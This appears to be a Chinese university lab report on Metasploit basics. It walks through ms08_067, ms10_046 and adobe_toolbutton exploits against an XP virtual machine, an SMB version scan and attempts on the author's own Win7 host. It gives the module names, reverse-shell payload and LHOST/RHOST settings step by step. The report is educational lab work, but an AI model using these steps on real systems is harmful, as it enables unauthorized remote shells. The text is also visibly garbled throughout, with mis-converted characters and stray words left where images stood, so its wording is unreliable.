20145215《網絡對抗》Exp5 MSF基礎應用

20145215《網絡對抗》Exp5 MSF基礎應用

基礎問題回答

  1. 用本身的話解釋什麼是exploit,payload,encode
    • exploit就至關因而載具,將真正要負責攻擊的代碼傳送到靶機中,我以爲老師上課舉的火箭和衛星的例子很是形象,火箭只是運載工具,它把衛星送入軌道就完成了它的任務,exploit的功能就和火箭差很少。
    • payload也就至關於載荷,實際上就是以前咱們實驗中作到的shellcodeexploit把它傳送到靶機中後,它就負責執行相應的攻擊代碼。
    • encode也就是編碼,它主要是爲了不以前的payload中出現壞字符,從而影響payload的功能,其次是爲了實現免殺,不讓殺毒軟件很輕易的就發現payload是攻擊代碼。

實踐內容

目錄

實驗環境配置

  • 攻擊機:Kali
  • 靶機: `windows XP SP3(English)

`shell

主動攻擊:ms08_067漏洞攻擊

  1. 一開始用的老師給的xp中文版虛擬機,結果一直提示沒有創建會話:
    windows

  2. 後面發現虛擬機中已經針對該漏洞打了補丁,將補丁卸載後,依然沒有成功:
    api

  3. 在百度上查了一下,有人說是由於xp中文版的問題,用英文版就不會出現相似錯誤,因而從同窗那拷了英文版的xp,後面就沒有出現相似問題。
  4. 先用search ms08_067指令查詢一下針對該漏洞能夠運用的攻擊模塊:
    瀏覽器

  5. use exploit/windows/smb/ms08_067_netapi使用該模塊,再使用show payloads查看能夠供咱們使用的payload:
    安全

  6. 咱們的目的是爲了獲取靶機的shell,所以這裏咱們選擇經過反向鏈接來獲取shellgeneric/shell_reverse_tcppayload,使用指令set payload generic/shell_reverse_tcp對payload進行設置:
    網絡

  7. 接着使用指令show options查看咱們須要設置的參數,發現須要設置一個RHOST(遠程主機,即靶機的IP地址)和一個LHOST(本地主機,即攻擊機的IP地址):
    session

  8. 設置完相應的參數後,再次使用show options對攻擊的選項進行查看:

    tcp

  9. 接着使用exploit指令開始攻擊,攻擊成功後獲取了靶機的shell,使用systeminfo指令查看靶機系統信息:
    工具

對瀏覽器攻擊:ms10_046漏洞攻擊

  1. 基本步驟仍是和上面同樣,先利用search ms10_046指令查看能夠運用的攻擊模塊:
    測試

  2. 而後查看須要設置的參數,SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,因此這裏SRVHOST和LHOST都應該填攻擊機的IP地址:

  3. 設置好參數後,進行查看:

  4. 使用exploit指令執行漏洞,能夠看到生成了一個url:

  5. 在靶機的IE瀏覽器上使用該url進行訪問,在MSF終端看見漏洞執行成功:

  6. 使用sessions指令查看當前存在的會話,能夠看到存在一個ID爲1的會話:

  7. 使用sessions -i 1選擇會話1,成功獲取了靶機的shell,利用systeminfo指令查看靶機的系統信息:

對Adobe的漏洞攻擊:adobe_toolbutton

  1. 先使用search adobe查詢和adobe漏洞有關的模塊,我選擇的是exploit/windows/fileformat/adobe_toolbutton,而後使用該模塊,設置回連的payload

  2. 查看須要設置的參數:

  3. 設置好相應參數後,開始實施攻擊,發如今/root/.msf4/local/目錄下成功生成了一個lxm.pdf文件:

  4. 而後將該文件傳送到靶機上,而且在攻擊機上打開監聽:


  5. 將靶機中的pdf文件打開,攻擊機成功獲取到靶機shell:

輔助模塊的應用:smb_version

  1. 使用show auxiliary查看能夠運用的輔助模塊:

  2. 我使用的是scanner/smb/smb_version,用來對靶機的smb版本進行掃描:

  3. 設置靶機的IP地址(也能夠設置要掃描的一段範圍),以及掃描使用的線程:

  4. 使用exploit指令開始掃描,成功掃描到靶機的smb版本:

嘗試利用漏洞對win7系統進行攻擊

  1. 以前的漏洞攻擊都是在靶機xp上完成的,以爲仍是有點弱,畢竟如今xp都沒人用了,因而想對主機win7進行一個漏洞測試攻擊。
  2. 一開始準備利用ms14_064漏洞來進行攻擊,配置好參數後,進行攻擊,獲得一串url:

  3. 將url複製到win7的IE瀏覽器上,結果出現找不到網頁:

  4. 個人IE瀏覽器版本是IE 11,這個版本應該是已經把這個漏洞給修復了。
  5. 因而,我在想若是用最新發現的漏洞能不能攻破win7,一開始在msf上搜ms17,結果什麼也沒搜到,後面搜ms16,只找到了幾個漏洞,我從裏面選了ms16_016漏洞來進行攻擊:

  6. 簡單查了一下這個漏洞,發現它是用來提權的,想到以前免殺實驗裏作的後門程序,經過回連得到的權限應該只是普通用戶,那我就用這個漏洞來進行提權。
  7. 因而打開kali的監聽,接着在win7上打開後門程序,使用getuid指令查看當前用戶權限,發現已是管理員權限了,那也就沒有必要用到ms16_016漏洞了:

  8. 後續再嘗試使用其餘漏洞...

    實驗總結與體會

  • 經過此次實驗咱們能夠看出,其實msf也只是給咱們提供了一個平臺,在實際的滲透過程當中,咱們不能徹底依靠msf來實現。咱們此次實驗攻擊的靶機都是xp系統,那些漏洞也都是很早以前的漏洞,換句話說,如今咱們大多數的電腦都把那些以前常見的漏洞給修復了,因此要想真正的去在實際中攻擊一臺計算機仍是有必定難度的。首先,要利用的漏洞應該是比較新的,而且相應的補丁也尚未發佈,在msf上關於17年漏洞的攻擊模塊目前尚未,是17年尚未發現漏洞嗎?固然不是,只是相關的攻擊代碼尚未更新出來,因此若是咱們能本身利用最新的漏洞去寫攻擊代碼,那成功率應該仍是挺高的。固然,我以爲msf在實際的滲透中應該也是有很是有幫助的,好比它有不少輔助模塊,咱們能夠利用這些模塊來蒐集咱們想要的一些信息,進而爲咱們更進一步的攻擊打下基礎。
  • ps:想看微軟的詳細漏洞信息能夠去微軟安全技術中心上找,那上面有最新公佈的漏洞
相關文章
相關標籤/搜索